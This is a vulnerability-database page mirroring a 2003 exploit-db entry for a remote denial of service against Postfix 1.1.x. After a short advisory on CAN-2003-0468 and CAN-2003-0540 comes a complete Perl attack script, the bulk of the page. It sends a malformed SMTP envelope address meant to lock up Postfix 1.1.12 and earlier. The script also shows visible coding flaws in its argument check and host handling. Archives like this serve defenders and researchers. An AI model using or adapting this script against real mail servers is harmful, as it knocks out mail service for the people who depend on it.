Lucene search
+L

Postfix 1.1.x - Denial of Service (2)

🗓️ 04 Aug 2003 00:00:00Reported by [email protected]Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

Postfix 1.1.x vulnerabilities allow denial of service through bounce-scanning and malformed addresses.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CAN-2003-0540
6 Aug 202410:29
cve
cve
CVE
CVE-2003-0540
5 Aug 200304:00
cve
cvelist
Cvelist
CVE-2003-0540
5 Aug 200304:00
cvelist
debiancve
Debian CVE
CVE-2003-0540
5 Aug 200304:00
debiancve
nessus
Tenable Nessus
Debian DSA-363-1 : postfix - denial of service, bounce-scanning
29 Sep 200400:00
nessus
nessus
Tenable Nessus
Mandrake Linux Security Advisory : postfix (MDKSA-2003:081)
31 Jul 200400:00
nessus
nessus
Tenable Nessus
Postfix < 2.0 Multiple Vulnerabilities
15 Aug 200300:00
nessus
nessus
Tenable Nessus
SUSE-SA:2003:033: postfix
25 Jul 200400:00
nessus
exploitdb
Exploit DB
Postfix 1.1.x - Denial of Service (1)
4 Aug 200300:00
exploitdb
exploitpack
exploitpack
Postfix 1.1.x - Denial of Service (2)
4 Aug 200300:00
exploitpack
Rows per page
source: https://www.securityfocus.com/bid/8333/info

Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host.

The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service.

#!/usr/bin/perl

#Remote Dos for postfix version 1.1.12
#tested on redhat 9.0, redhat 8.0, mandrake 9.0
#deadbeat,
#mail: [email protected]
#	 [email protected]
#
#thanks..enjoy ;)

use IO::Socket;
if (!$ARGV[3]){
   die "Usage:perl $0 <subject> <data> <smtp host to use>\n";
}
$subject = $ARGV[0];
$junk = $ARGV[1];
$smtp_host = $ARGV[2];


$helo = "HELO $smtp_host\r\n";
$rcpt = "RCPT To:<[email protected]>\r\n";
$data = "DATA\n$junk\r\n";
$sub = "Subject: $subject\r\n";
$from = "MAIL From <.!@$smtp_host>\r\n";
print "Going to connect to $smtp_host\n";
$sox = IO::Socket::INET->new(
   Proto=> 'tcp',
   PeerPort=>'25',
   PeerAddr=>'$smtp_host',
);
print "Connected...\n";
print $sox $helo;
sleep 1;
print $sox $from;
sleep 1;
print $sox $rcpt;
sleep 1;
print $sox $sub;
sleep 1;
print $sox $data;
sleep 1;
print $sox ".\r\n\r\n";
sleep 1;
close $sox;
print "Done..should lock up Postfix 1.1.12 and below ;)\n\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.21261
49